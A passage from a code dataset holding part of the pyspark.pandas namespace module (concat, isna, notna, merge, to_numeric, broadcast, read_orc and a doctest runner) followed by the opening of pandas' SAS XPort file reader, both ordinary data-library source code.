``DataFrame``, a ``DataFrame`` is returned. When concatenating along
the columns (axis=1), a ``DataFrame`` is returned.
See Also
--------
Series.append : Concatenate Series.
DataFrame.join : Join DataFrames using indexes.
DataFrame.merge : Merge DataFrames by indexes or columns.
Examples
--------
>>> from pyspark.pandas.config import set_option, reset_option
>>> set_option("compute.ops_on_diff_frames", True)
Combine two ``Series``.
>>> s1 = pp.Series(['a', 'b'])
>>> s2 = pp.Series(['c', 'd'])
>>> pp.concat([s1, s2])
0 a
1 b
0 c
1 d
dtype: object
Clear the existing index and reset it in the result
by setting the ``ignore_index`` option to ``True``.
>>> pp.concat([s1, s2], ignore_index=True)
0 a
1 b
2 c
3 d
dtype: object
Combine two ``DataFrame`` objects with identical columns.
>>> df1 = pp.DataFrame([['a', 1], ['b', 2]],
... columns=['letter', 'number'])
>>> df1
letter number
0 a 1
1 b 2
>>> df2 = pp.DataFrame([['c', 3], ['d', 4]],
... columns=['letter', 'number'])
>>> df2
letter number
0 c 3
1 d 4
>>> pp.concat([df1, df2])
letter number
0 a 1
1 b 2
0 c 3
1 d 4
Combine ``DataFrame`` and ``Series`` objects with different columns.
>>> pp.concat([df2, s1])
letter number 0
0 c 3.0 None
1 d 4.0 None
0 None NaN a
1 None NaN b
Combine ``DataFrame`` objects with overlapping columns
and return everything. Columns outside the intersection will
be filled with ``None`` values.
>>> df3 = pp.DataFrame([['c', 3, 'cat'], ['d', 4, 'dog']],
... columns=['letter', 'number', 'animal'])
>>> df3
letter number animal
0 c 3 cat
1 d 4 dog
>>> pp.concat([df1, df3])
letter number animal
0 a 1 None
1 b 2 None
0 c 3 cat
1 d 4 dog
Sort the columns.
>>> pp.concat([df1, df3], sort=True)
animal letter number
0 None a 1
1 None b 2
0 cat c 3
1 dog d 4
Combine ``DataFrame`` objects with overlapping columns
and return only those that are shared by passing ``inner`` to
the ``join`` keyword argument.
>>> pp.concat([df1, df3], join="inner")
letter number
0 a 1
1 b 2
0 c 3
1 d 4
>>> df4 = pp.DataFrame([['bird', 'polly'], ['monkey', 'george']],
... columns=['animal', 'name'])
Combine with column axis.
>>> pp.concat([df1, df4], axis=1)
letter number animal name
0 a 1 bird polly
1 b 2 monkey george
>>> reset_option("compute.ops_on_diff_frames")
"""
if isinstance(objs, (DataFrame, IndexOpsMixin)) or not isinstance(
objs, Iterable
): # TODO: support dict
raise TypeError(
"first argument must be an iterable of Koalas "
"objects, you passed an object of type "
'"{name}"'.format(name=type(objs).__name__)
)
if len(cast(Sized, objs)) == 0:
raise ValueError("No objects to concatenate")
objs = list(filter(lambda obj: obj is not None, objs))
if len(objs) == 0:
raise ValueError("All objects passed were None")
for obj in objs:
if not isinstance(obj, (Series, DataFrame)):
raise TypeError(
"cannot concatenate object of type "
"'{name}"
"; only pp.Series "
"and pp.DataFrame are valid".format(name=type(objs).__name__)
)
if join not in ["inner", "outer"]:
raise ValueError("Only can inner (intersect) or outer (union) join the other axis.")
axis = validate_axis(axis)
if axis == 1:
kdfs = [obj.to_frame() if isinstance(obj, Series) else obj for obj in objs]
level = min(kdf._internal.column_labels_level for kdf in kdfs)
kdfs = [
DataFrame._index_normalized_frame(level, kdf)
if kdf._internal.column_labels_level > level
else kdf
for kdf in kdfs
]
concat_kdf = kdfs[0]
column_labels = concat_kdf._internal.column_labels.copy()
kdfs_not_same_anchor = []
for kdf in kdfs[1:]:
duplicated = [label for label in kdf._internal.column_labels if label in column_labels]
if len(duplicated) > 0:
pretty_names = [name_like_string(label) for label in duplicated]
raise ValueError(
"Labels have to be unique; however, got duplicated labels %s." % pretty_names
)
column_labels.extend(kdf._internal.column_labels)
if same_anchor(concat_kdf, kdf):
concat_kdf = DataFrame(
concat_kdf._internal.with_new_columns(
[
concat_kdf._kser_for(label)
for label in concat_kdf._internal.column_labels
]
+ [kdf._kser_for(label) for label in kdf._internal.column_labels]
)
)
else:
kdfs_not_same_anchor.append(kdf)
if len(kdfs_not_same_anchor) > 0:
def resolve_func(kdf, this_column_labels, that_column_labels):
raise AssertionError("This should not happen.")
for kdf in kdfs_not_same_anchor:
if join == "inner":
concat_kdf = align_diff_frames(
resolve_func, concat_kdf, kdf, fillna=False, how="inner",
)
elif join == "outer":
concat_kdf = align_diff_frames(
resolve_func, concat_kdf, kdf, fillna=False, how="full",
)
concat_kdf = concat_kdf[column_labels]
if ignore_index:
concat_kdf.columns = list(map(str, _range(len(concat_kdf.columns))))
if sort:
concat_kdf = concat_kdf.sort_index()
return concat_kdf
# Series, Series ...
# We should return Series if objects are all Series.
should_return_series = all(map(lambda obj: isinstance(obj, Series), objs))
# DataFrame, Series ... & Series, Series ...
# In this case, we should return DataFrame.
new_objs = []
num_series = 0
series_names = set()
for obj in objs:
if isinstance(obj, Series):
num_series += 1
series_names.add(obj.name)
obj = obj.to_frame(DEFAULT_SERIES_NAME)
new_objs.append(obj)
objs = new_objs
column_labels_levels = set(obj._internal.column_labels_level for obj in objs)
if len(column_labels_levels) != 1:
raise ValueError("MultiIndex columns should have the same levels")
# DataFrame, DataFrame, ...
# All Series are converted into DataFrame and then compute concat.
if not ignore_index:
indices_of_kdfs = [kdf.index for kdf in objs]
index_of_first_kdf = indices_of_kdfs[0]
for index_of_kdf in indices_of_kdfs:
if index_of_first_kdf.names != index_of_kdf.names:
raise ValueError(
"Index type and names should be same in the objects to concatenate. "
"You passed different indices "
"{index_of_first_kdf} and {index_of_kdf}".format(
index_of_first_kdf=index_of_first_kdf.names, index_of_kdf=index_of_kdf.names
)
)
column_labels_of_kdfs = [kdf._internal.column_labels for kdf in objs]
if ignore_index:
index_names_of_kdfs = [[] for _ in objs] # type: List
else:
index_names_of_kdfs = [kdf._internal.index_names for kdf in objs]
if all(name == index_names_of_kdfs[0] for name in index_names_of_kdfs) and all(
idx == column_labels_of_kdfs[0] for idx in column_labels_of_kdfs
):
# If all columns are in the same order and values, use it.
kdfs = objs
else:
if join == "inner":
interested_columns = set.intersection(*map(set, column_labels_of_kdfs))
# Keep the column order with its firsts DataFrame.
merged_columns = [
label for label in column_labels_of_kdfs[0] if label in interested_columns
]
# When multi-index column, although pandas is flaky if `join="inner" and sort=False`,
# always sort to follow the `join="outer"` case behavior.
if (len(merged_columns) > 0 and len(merged_columns[0]) > 1) or sort:
# FIXME: better ordering
merged_columns = sorted(merged_columns, key=name_like_string)
kdfs = [kdf[merged_columns] for kdf in objs]
elif join == "outer":
merged_columns = []
for labels in column_labels_of_kdfs:
merged_columns.extend(label for label in labels if label not in merged_columns)
assert len(merged_columns) > 0
if LooseVersion(pd.__version__) < LooseVersion("0.24"):
# Always sort when multi-index columns, and if there are Series, never sort.
sort = len(merged_columns[0]) > 1 or (num_series == 0 and sort)
else:
# Always sort when multi-index columns or there are more than two Series,
# and if there is only one Series, never sort.
sort = len(merged_columns[0]) > 1 or num_series > 1 or (num_series != 1 and sort)
if sort:
# FIXME: better ordering
merged_columns = sorted(merged_columns, key=name_like_string)
kdfs = []
for kdf in objs:
columns_to_add = list(set(merged_columns) - set(kdf._internal.column_labels))
# TODO: NaN and None difference for missing values. pandas seems filling NaN.
sdf = kdf._internal.resolved_copy.spark_frame
for label in columns_to_add:
sdf = sdf.withColumn(name_like_string(label), F.lit(None))
data_columns = kdf._internal.data_spark_column_names + [
name_like_string(label) for label in columns_to_add
]
kdf = DataFrame(
kdf._internal.copy(
spark_frame=sdf,
index_spark_columns=[
scol_for(sdf, col) for col in kdf._internal.index_spark_column_names
],
column_labels=(kdf._internal.column_labels + columns_to_add),
data_spark_columns=[scol_for(sdf, col) for col in data_columns],
data_dtypes=(kdf._internal.data_dtypes + ([None] * len(columns_to_add))),
)
)
kdfs.append(kdf[merged_columns])
if ignore_index:
sdfs = [kdf._internal.spark_frame.select(kdf._internal.data_spark_columns) for kdf in kdfs]
else:
sdfs = [
kdf._internal.spark_frame.select(
kdf._internal.index_spark_columns + kdf._internal.data_spark_columns
)
for kdf in kdfs
]
concatenated = reduce(lambda x, y: x.union(y), sdfs)
if ignore_index:
index_spark_column_names = []
index_names = []
index_dtypes = []
else:
index_spark_column_names = kdfs[0]._internal.index_spark_column_names
index_names = kdfs[0]._internal.index_names
index_dtypes = kdfs[0]._internal.index_dtypes
result_kdf = DataFrame(
kdfs[0]._internal.copy(
spark_frame=concatenated,
index_spark_columns=[scol_for(concatenated, col) for col in index_spark_column_names],
index_names=index_names,
index_dtypes=index_dtypes,
data_spark_columns=[
scol_for(concatenated, col) for col in kdfs[0]._internal.data_spark_column_names
],
data_dtypes=None, # TODO: dtypes?
)
) # type: DataFrame
if should_return_series:
# If all input were Series, we should return Series.
if len(series_names) == 1:
name = series_names.pop()
else:
name = None
return first_series(result_kdf).rename(name)
else:
return result_kdf
def melt(frame, id_vars=None, value_vars=None, var_name=None, value_name="value") -> DataFrame:
return DataFrame.melt(frame, id_vars, value_vars, var_name, value_name)
melt.__doc__ = DataFrame.melt.__doc__
def isna(obj):
"""
Detect missing values for an array-like object.
This function takes a scalar or array-like object and indicates
whether values are missing (``NaN`` in numeric arrays, ``None`` or ``NaN``
in object arrays).
Parameters
----------
obj : scalar or array-like
Object to check for null or missing values.
Returns
-------
bool or array-like of bool
For scalar input, returns a scalar boolean.
For array input, returns an array of boolean indicating whether each
corresponding element is missing.
See Also
--------
Series.isna : Detect missing values in a Series.
Series.isnull : Detect missing values in a Series.
DataFrame.isna : Detect missing values in a DataFrame.
DataFrame.isnull : Detect missing values in a DataFrame.
Index.isna : Detect missing values in an Index.
Index.isnull : Detect missing values in an Index.
Examples
--------
Scalar arguments (including strings) result in a scalar boolean.
>>> pp.isna('dog')
False
>>> pp.isna(np.nan)
True
ndarrays result in an ndarray of booleans.
>>> array = np.array([[1, np.nan, 3], [4, 5, np.nan]])
>>> array
array([[ 1., nan, 3.],
[ 4., 5., nan]])
>>> pp.isna(array)
array([[False, True, False],
[False, False, True]])
For Series and DataFrame, the same type is returned, containing booleans.
>>> df = pp.DataFrame({'a': ['ant', 'bee', 'cat'], 'b': ['dog', None, 'fly']})
>>> df
a b
0 ant dog
1 bee None
2 cat fly
>>> pp.isna(df)
a b
0 False False
1 False True
2 False False
>>> pp.isnull(df.b)
0 False
1 True
2 False
Name: b, dtype: bool
"""
# TODO: Add back:
# notnull : Boolean inverse of pandas.isnull.
# into the See Also in the docstring. It does not find the method in the latest numpydoc.
if isinstance(obj, (DataFrame, Series)):
return obj.isnull()
else:
return pd.isnull(obj)
isnull = isna
def notna(obj):
"""
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. NA values, such as None or
:attr:`numpy.NaN`, get mapped to False values.
Returns
-------
bool or array-like of bool
Mask of bool values for each element that
indicates whether an element is not an NA value.
See Also
--------
isna : Detect missing values for an array-like object.
Series.notna : Boolean inverse of Series.isna.
DataFrame.notnull : Boolean inverse of DataFrame.isnull.
Index.notna : Boolean inverse of Index.isna.
Index.notnull : Boolean inverse of Index.isnull.
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pp.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notnull()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pp.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> pp.notna(ser)
0 True
1 True
2 False
dtype: bool
>>> pp.notna(ser.index)
True
"""
# TODO: Add back:
# Series.notnull :Boolean inverse of Series.isnull.
# DataFrame.notna :Boolean inverse of DataFrame.isna.
# into the See Also in the docstring. It does not find the method in the latest numpydoc.
if isinstance(obj, (DataFrame, Series)):
return obj.notna()
else:
return pd.notna(obj)
notnull = notna
def merge(
obj,
right: "DataFrame",
how: str = "inner",
on: Union[Any, List[Any], Tuple, List[Tuple]] = None,
left_on: Union[Any, List[Any], Tuple, List[Tuple]] = None,
right_on: Union[Any, List[Any], Tuple, List[Tuple]] = None,
left_index: bool = False,
right_index: bool = False,
suffixes: Tuple[str, str] = ("_x", "_y"),
) -> "DataFrame":
"""
Merge DataFrame objects with a database-style join.
The index of the resulting DataFrame will be one of the following:
- 0...n if no index is used for merging
- Index of the left DataFrame if merged only on the index of the right DataFrame
- Index of the right DataFrame if merged only on the index of the left DataFrame
- All involved indices if merged using the indices of both DataFrames
e.g. if `left` with indices (a, x) and `right` with indices (b, x), the result will
be an index (x, a, b)
Parameters
----------
right: Object to merge with.
how: Type of merge to be performed.
{'left', 'right', 'outer', 'inner'}, default 'inner'
left: use only keys from left frame, similar to a SQL left outer join; preserve key
order.
right: use only keys from right frame, similar to a SQL right outer join; preserve key
order.
outer: use union of keys from both frames, similar to a SQL full outer join; sort keys
lexicographically.
inner: use intersection of keys from both frames, similar to a SQL inner join;
preserve the order of the left keys.
on: Column or index level names to join on. These must be found in both DataFrames. If on
is None and not merging on indexes then this defaults to the intersection of the
columns in both DataFrames.
left_on: Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on: Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index: Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index or a number of
columns) must match the number of levels.
right_index: Use the index from the right DataFrame as the join key. Same caveats as
left_index.
suffixes: Suffix to apply to overlapping column names in the left and right side,
respectively.
Returns
-------
DataFrame
A DataFrame of the two merged objects.
Examples
--------
>>> df1 = pp.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [1, 2, 3, 5]},
... columns=['lkey', 'value'])
>>> df2 = pp.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [5, 6, 7, 8]},
... columns=['rkey', 'value'])
>>> df1
lkey value
0 foo 1
1 bar 2
2 baz 3
3 foo 5
>>> df2
rkey value
0 foo 5
1 bar 6
2 baz 7
3 foo 8
Merge df1 and df2 on the lkey and rkey columns. The value columns have
the default suffixes, _x and _y, appended.
>>> merged = pp.merge(df1, df2, left_on='lkey', right_on='rkey')
>>> merged.sort_values(by=['lkey', 'value_x', 'rkey', 'value_y']) # doctest: +ELLIPSIS
lkey value_x rkey value_y
...bar 2 bar 6
...baz 3 baz 7
...foo 1 foo 5
...foo 1 foo 8
...foo 5 foo 5
...foo 5 foo 8
>>> left_kdf = pp.DataFrame({'A': [1, 2]})
>>> right_kdf = pp.DataFrame({'B': ['x', 'y']}, index=[1, 2])
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True).sort_index()
A B
1 2 x
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True, how='left').sort_index()
A B
0 1 None
1 2 x
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True, how='right').sort_index()
A B
1 2.0 x
2 NaN y
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True, how='outer').sort_index()
A B
0 1.0 None
1 2.0 x
2 NaN y
Notes
-----
As described in #263, joining string columns currently returns None for missing values
instead of NaN.
"""
return obj.merge(
right,
how=how,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
suffixes=suffixes,
)
def to_numeric(arg):
"""
Convert argument to a numeric type.
Parameters
----------
arg : scalar, list, tuple, 1-d array, or Series
Returns
-------
ret : numeric if parsing succeeded.
See Also
--------
DataFrame.astype : Cast argument to a specified dtype.
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
numpy.ndarray.astype : Cast a numpy array to a specified type.
Examples
--------
>>> kser = pp.Series(['1.0', '2', '-3'])
>>> kser
0 1.0
1 2
2 -3
dtype: object
>>> pp.to_numeric(kser)
0 1.0
1 2.0
2 -3.0
dtype: float32
If given Series contains invalid value to cast float, just cast it to `np.nan`
>>> kser = pp.Series(['apple', '1.0', '2', '-3'])
>>> kser
0 apple
1 1.0
2 2
3 -3
dtype: object
>>> pp.to_numeric(kser)
0 NaN
1 1.0
2 2.0
3 -3.0
dtype: float32
Also support for list, tuple, np.array, or a scalar
>>> pp.to_numeric(['1.0', '2', '-3'])
array([ 1., 2., -3.])
>>> pp.to_numeric(('1.0', '2', '-3'))
array([ 1., 2., -3.])
>>> pp.to_numeric(np.array(['1.0', '2', '-3']))
array([ 1., 2., -3.])
>>> pp.to_numeric('1.0')
1.0
"""
if isinstance(arg, Series):
return arg._with_new_scol(arg.spark.column.cast("float"))
else:
return pd.to_numeric(arg)
def broadcast(obj) -> DataFrame:
"""
Marks a DataFrame as small enough for use in broadcast joins.
Parameters
----------
obj : DataFrame
Returns
-------
ret : DataFrame with broadcast hint.
See Also
--------
DataFrame.merge : Merge DataFrame objects with a database-style join.
DataFrame.join : Join columns of another DataFrame.
DataFrame.update : Modify in place using non-NA values from another DataFrame.
DataFrame.hint : Specifies some hint on the current DataFrame.
Examples
--------
>>> df1 = pp.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [1, 2, 3, 5]},
... columns=['lkey', 'value']).set_index('lkey')
>>> df2 = pp.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [5, 6, 7, 8]},
... columns=['rkey', 'value']).set_index('rkey')
>>> merged = df1.merge(pp.broadcast(df2), left_index=True, right_index=True)
>>> merged.spark.explain() # doctest: +ELLIPSIS
== Physical Plan ==
...
...BroadcastHashJoin...
...
"""
if not isinstance(obj, DataFrame):
raise ValueError("Invalid type : expected DataFrame got {}".format(type(obj).__name__))
return DataFrame(
obj._internal.with_new_sdf(F.broadcast(obj._internal.resolved_copy.spark_frame))
)
def read_orc(
path,
columns: Optional[List[str]] = None,
index_col: Optional[Union[str, List[str]]] = None,
**options
) -> "DataFrame":
"""
Load an ORC object from the file path, returning a DataFrame.
Parameters
----------
path : str
The path string storing the ORC file to be read.
columns : list, default None
If not None, only these columns will be read from the file.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options : dict
All other options passed directly into Spark's data source.
Returns
-------
DataFrame
Examples
--------
>>> pp.range(1).to_orc('%s/read_spark_io/data.orc' % path)
>>> pp.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'])
id
0 0
You can preserve the index in the roundtrip as below.
>>> pp.range(1).to_orc('%s/read_spark_io/data.orc' % path, index_col="index")
>>> pp.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'], index_col="index")
... # doctest: +NORMALIZE_WHITESPACE
id
index
0 0
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
kdf = read_spark_io(path, format="orc", index_col=index_col, **options)
if columns is not None:
kdf_columns = kdf.columns
new_columns = list()
for column in list(columns):
if column in kdf_columns:
new_columns.append(column)
else:
raise ValueError("Unknown column name '{}'".format(column))
kdf = kdf[new_columns]
return kdf
def _get_index_map(
sdf: spark.DataFrame, index_col: Optional[Union[str, List[str]]] = None
) -> Tuple[Optional[List[spark.Column]], Optional[List[Tuple]]]:
if index_col is not None:
if isinstance(index_col, str):
index_col = [index_col]
sdf_columns = set(sdf.columns)
for col in index_col:
if col not in sdf_columns:
raise KeyError(col)
index_spark_columns = [
scol_for(sdf, col) for col in index_col
] # type: Optional[List[spark.Column]]
index_names = [(col,) for col in index_col] # type: Optional[List[Tuple]]
else:
index_spark_columns = None
index_names = None
return index_spark_columns, index_names
_get_dummies_default_accept_types = (DecimalType, StringType, DateType)
_get_dummies_acceptable_types = _get_dummies_default_accept_types + (
ByteType,
ShortType,
IntegerType,
LongType,
FloatType,
DoubleType,
BooleanType,
TimestampType,
)
def _test():
import os
import doctest
import shutil
import sys
import tempfile
import uuid
from pyspark.sql import SparkSession
import pyspark.pandas.namespace
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.pandas.namespace.__dict__.copy()
globs["pp"] = pyspark.pandas
spark = (
SparkSession.builder.master("local[4]")
.appName("pyspark.pandas.namespace tests")
.getOrCreate()
)
db_name = "db%s" % str(uuid.uuid4()).replace("-", "")
spark.sql("CREATE DATABASE %s" % db_name)
globs["db"] = db_name
path = tempfile.mkdtemp()
globs["path"] = path
(failure_count, test_count) = doctest.testmod(
pyspark.pandas.namespace,
globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
)
shutil.rmtree(path, ignore_errors=True)
spark.sql("DROP DATABASE IF EXISTS %s CASCADE" % db_name)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
py | 1a4ba544f5d591659cd9f2944eb4278a0e53d3b6 | """
Read a SAS XPort format file into a Pandas DataFrame.
Based on code from Jack Cushman (github.com/jcushman/xport).
The file format is defined here:
https://support.sas.com/techsup/technote/ts140.pdf
"""
from collections import abc
from datetime import datetime
import struct
import warnings
import numpy as np
from pandas.util._decorators import Appender
import pandas as pd
from pandas.io.common import get_filepath_or_buffer
from pandas.io.sas.sasreader import ReaderBase
_correct_line1 = (
"HEADER RECORD*******LIBRARY HEADER RECORD!!!!!!!"
"000000000000000000000000000000 "
)
_correct_header1 = (
"HEADER RECORD*******MEMBER HEADER RECORD!!!!!!!000000000000000001600000000"
)
_correct_header2 = (
"HEADER RECORD*******DSCRPTR HEADER RECORD!!!!!!!"
"000000000000000000000000000000 "
)
_correct_obs_header = (
"HEADER RECORD*******OBS HEADER RECORD!!!!!!!"
"000000000000000000000000000000 "
)
_fieldkeys = [
"ntype",
"nhfun",
"field_length",
"nvar0",
"name",
"label",
"nform",
"nfl",
"num_decimals",
"nfj",
"nfill",
"niform",
"nifl",
"nifd",
"npos",
"_",
]
_base_params_doc = """\
Parameters
----------
filepath_or_buffer : string or file-like object
Path to SAS file or object implementing binary read method."""
_params2_doc = """\
index : identifier of index column
Identifier of column that should be used as index of the DataFrame.
encoding : string
Encoding for text data.
chunksize : int
Read file `chunksize` lines at a time, returns iterator."""
_format_params_doc = """\
format : string
File format, only `xport` is currently supported."""
_iterator_doc = """\
iterator : boolean, default False
Return XportReader object for reading file incrementally."""
_read_sas_doc = f"""Read a SAS file into a DataFrame.
{_base_params_doc}
{_format_params_doc}
{_params2_doc}
{_iterator_doc}
Returns
-------
DataFrame or XportReader
Examples
--------
Read a SAS Xport file:
>>> df = pd.read_sas('filename.XPT')
Read a Xport file in 10,000 line chunks:
>>> itr = pd.read_sas('filename.XPT', chunksize=10000)
>>> for chunk in itr:
>>> do_something(chunk)
"""
_xport_reader_doc = f"""\
Class for reading SAS Xport files.
{_base_params_doc}
{_params2_doc}
Attributes
----------
member_info : list
Contains information about the file
fields : list
Contains information about the variables in the file
"""
_read_method_doc = """\
Read observations from SAS Xport file, returning as data frame.
Parameters
----------
nrows : int
Number of rows to read from data file; if None, read whole
file.
Returns
-------
A DataFrame.
"""
def _parse_date(datestr: str) -> datetime:
""" Given a date in xport format, return Python date. """
try:
# e.g. "16FEB11:10:07:55"
return datetime.strptime(datestr, "%d%b%y:%H:%M:%S")
except ValueError:
return pd.NaT
def _split_line(s: str, parts):
"""
Parameters
----------
s: str
Fixed-length string to split
parts: list of (name, length) pairs
Used to break up string, name '_' will be filtered from output.
Returns
-------
Dict of name:contents of string at given location.
"""
out = {}
start = 0
for name, length in parts:
out[name] = s[start : start + length].strip()
start += length
del out["_"]
return out
def _handle_truncated_float_vec(vec, nbytes):
# This feature is not well documented, but some SAS XPORT files
# have 2-7 byte "truncated" floats. To read these truncated
# floats, pad them with zeros on the right to make 8 byte floats.
#
# References:
# https://github.com/jcushman/xport/pull/3
# The R "foreign" library
if nbytes != 8:
vec1 = np.zeros(len(vec), np.dtype("S8"))
dtype = np.dtype(f"S{nbytes},S{8 - nbytes}")
vec2 = vec1.view(dtype=dtype)
vec2["f0"] = vec
return vec2
return vec
def _parse_float_vec(vec):
"""
Parse a vector of float values representing IBM 8 byte floats into
native 8 byte floats.
"""
dtype = np.dtype(">u4,>u4")
vec1 = vec.view(dtype=dtype)
xport1 = vec1["f0"]
xport2 = vec1["f1"]
# Start by setting first half of ieee number to first half of IBM
# number sans exponent
ieee1 = xport1 & 0x00FFFFFF
# The fraction bit to the left of the binary point in the ieee
# format was set and the number was shifted 0, 1, 2, or 3
# places. This will tell us how to adjust the ibm exponent to be a
# power of 2 ieee exponent and how to shift the fraction bits to
# restore the correct magnitude.
shift = np.zeros(len(vec), dtype=np.uint8)
shift[np.where(xport1 & 0x00200000)] = 1
shift[np.where(xport1 & 0x00400000)] = 2
shift[np.where(xport1 & 0x00800000)] = 3
# shift the ieee number down the correct number of places then
# set the second half of the ieee number to be the second half
# of the ibm number shifted appropriately, ored with the bits
# from the first half that would have been shifted in if we
# could shift a double. All we are worried about are the low
# order 3 bits of the first half since we're only shifting by
# 1, 2, or 3.
ieee1 >>= shift
ieee2 = (xport2 >> shift) | ((xport1 & 0x00000007) << (29 + (3 - shift)))
# clear the 1 bit to the left of the binary point
ieee1 &= 0xFFEFFFFF
# set the exponent of the ieee number to be the actual exponent
# plus the shift count + 1023. Or this into the first half of the
# ieee number. The ibm exponent is excess 64 but is adjusted by 65
# since during conversion to ibm format the exponent is
# incremented by 1 and the fraction bits left 4 positions to the
# right of the radix point. (had to add >> 24 because C treats &
# 0x7f as 0x7f000000 and Python doesn't)
ieee1 |= ((((((xport1 >> 24) & 0x7F) - 65) << 2) + shift + 1023) << 20) | (
xport1 & 0x80000000
)
ieee = np.empty((len(ieee1),), dtype=">u4,>u4")
ieee["f0"] = ieee1
ieee["f1"] = ieee2
ieee = ieee.view(dtype=">f8")
ieee = ieee.astype("f8")
return ieee
class XportReader(ReaderBase, abc.Iterator):
__doc__ = _xport_reader_doc
def __init__(
self, filepath_or_buffer, index=None, encoding="ISO-8859-1", chunksize=None
):
self._encoding = encoding
self._lines_read = 0
self._index = index
self._chunksize = chunksize
if isinstance(filepath_or_buffer, str):
filepath_or_buffer = get_filepath_or_buffer(
filepath_or_buffer, encoding=encoding
).filepath_or_buffer
if isinstance(filepath_or_buffer, (str, bytes)):
self.filepath_or_buffer = open(filepath_or_buffer, "rb")
else:
# Since xport files include non-text byte sequences, xport files
# should already be opened in binary mode in Python 3.
self.filepath_or_buffer = filepath_or_buffer
self._read_header()
def close(self):
self.filepath_or_buffer.close()
def _get_row(self):
return self.filepath_or_buffer.read(80).decode()
def _read_header(self):
self.filepath_or_buffer.seek(0)
# read file header
line1 = self._get_row()
if line1 != _correct_line1:
self.close()
raise ValueError("Header record is not an XPORT file.")
line2 = self._get_row()
fif = [["prefix", 24], ["version", 8], ["OS", 8], ["_", 24], ["created", 16]]
file_info = _split_line(line2, fif)
if file_info["prefix"] != "SAS SAS SASLIB":
self.close()
raise ValueError("Header record has invalid prefix.")
file_info["created"] = _parse_date(file_info["created"])
self.file_info = file_info
line3 = self._get_row()
file_info["modified"] = _parse_date(line3[:16])
# read member header
header1 = self._get_row()
header2 = self._get_row()
headflag1 = header1.startswith(_correct_header1)
headflag2 = header2 == _correct_header2
if not (headflag1 and headflag2):
self.close()
raise ValueError("Member header not found")
# usually 140, could be 135
fieldnamelength = int(header1[-5:-2])
# member info
mem = [
["prefix", 8],
["set_name", 8],
["sasdata", 8],
["version", 8],
["OS", 8],
["_", 24],
["created", 16],
]
member_info = _split_line(self._get_row(), mem)
mem = [["modified", 16], ["_", 16], ["label", 40], ["type", 8]]
member_info.update(_split_line(self._get_row(), mem))
member_info["modified"] = _parse_date(member_info["modified"])
member_info["created"] = _parse_date(member_info["created"])
self.member_info = member_info
# read field names
types = {1: "numeric", 2: "char"}
fieldcount = int(self._get_row()[54:58])
datalength = fieldnamelength * fieldcount
# round up to nearest 80
if datalength % 80:
datalength += 80 - datalength % 80
fielddata = self.filepath_or_buffer.read(datalength)
fields = []
obs_length = 0
while len(fielddata) >= fieldnamelength:
# pull data for one field
field, fielddata = (
fielddata[:fieldnamelength],
fielddata[fieldnamelength:],
)
# rest at end gets ignored, so if field is short, pad out
# to match struct pattern below
field = field.ljust(140)
fieldstruct = struct.unpack(">hhhh8s40s8shhh2s8shhl52s", field)
field = dict(zip(_fieldkeys, fieldstruct))
del field["_"]
field["ntype"] = types[field["ntype"]]
fl = field["field_length"]
if field["ntype"] == "numeric" and ((fl < 2) or (fl > 8)):
self.close()
msg = f"Floating field width {fl} is not between 2 and 8."
raise TypeError(msg)
for k, v in field.items():
try:
field[k] = v.strip()
except AttributeError:
pass
obs_length += field["field_length"]
fields += [field]
header = self._get_row()
if not header == _correct_obs_header:
self.close()
raise ValueError("Observation header not found.")
self.fields = fields
self.record_length = obs_length
self.record_start = self.filepath_or_buffer.tell()
self.nobs = self._record_count()
self.columns = [x["name"].decode() for x in self.fields]
# Setup the dtype.
dtypel = [
("s" + str(i), "S" + str(field["field_length"]))
for i, field in enumerate(self.fields)
]
dtype = np.dtype(dtypel)
self._dtype = dtype
def __next__(self):
return self.read(nrows=self._chunksize or 1)
def _record_count(self) -> int:
"""
Get number of records in file.
This is maybe suboptimal because we have to seek to the end of
the file.
Side effect: returns file position to record_start.
"""
self.filepath_or_buffer.seek(0, 2)
total_records_length = self.filepath_or_buffer.tell() - self.record_start
if total_records_length % 80 != 0:
warnings.warn("xport file may be corrupted")
if self.record_length > 80:
self.filepath_or_buffer.seek(self.record_start)
return total_records_length // self.record_length
self.filepath_or_buffer.seek(-80, 2)
last_card = self.filepath_or_buffer.read(80)
last_card = np.frombuffer(last_card, dtype=np.uint64)
# 8 byte blank
ix = np.flatnonzero(last_card == 2314885530818453536)
if len(ix) == 0:
tail_pad = 0
else:
tail_pad = 8 * len(ix)
